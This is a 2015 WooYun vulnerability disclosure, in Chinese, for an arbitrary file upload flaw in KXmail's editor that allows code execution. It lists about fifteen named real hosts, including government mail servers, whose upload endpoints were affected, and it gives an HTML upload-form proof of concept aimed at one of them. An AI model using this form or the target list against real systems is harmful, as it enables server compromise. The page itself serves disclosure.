当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0103185
漏洞标题:
KXmail任意文件上传导致代码执行
相关厂商:
科信软件
漏洞作者:
路人甲
提交时间:
2015-03-24 15:41
修复时间:
2015-05-08 15:42
公开时间:
2015-05-08 15:42
漏洞类型:
文件上传导致任意代码执行
危害等级:
自评Rank:
20
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-03-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

上传页面:http://mail.scihc.net/editor/filemanager/upload/php/upload.php
案例如下:
http://mail.cdzk.org:8888/editor/filemanager/connectors/php/upload.php
http://mail.scihc.net/editor/filemanager/upload/php/upload.php
http://mail.ziyang.gov.cn/editor/filemanager/upload/php/upload.php
http://oa.chinacrt.com/editor/filemanager/connectors/php/upload.php
http://mail.cngy.gov.cn:8888/editor/filemanager/upload/php/upload.php
https://mail.ichengsi.com:4443/editor/filemanager/upload/php/upload.php
http://mail.ccpc.cq.cn/editor/filemanager/connectors/php/upload.php
http://mail.ksitri.com/editor/filemanager/connectors/php/upload.php
http://mail.smjy.net//editor/filemanager/upload/php/upload.php
http://mail.sztour.com.cn//editor/filemanager/connectors/php/upload.php
http://www.100fen.com/editor/filemanager/connectors/php/upload.php
http://gmail.njx.cn/editor/filemanager/connectors/php/upload.php
http://222.208.63.35/editor/filemanager/upload/php/upload.php
http://mail.shenzhougroup.com//editor/filemanager/connectors/php/upload.php
http://newspaper.jinchengbank.com/editor/filemanager/connectors/php/upload.php
POC

<form id="frmUpload" enctype="multipart/form-data"
action="http://mail.scihc.net/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>


1.png


2.png


以上均可复现。

漏洞证明:

1.png


2.png


修复方案:

对文件扩展名重命名操作

版权声明:转载请注明来源 路人甲@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)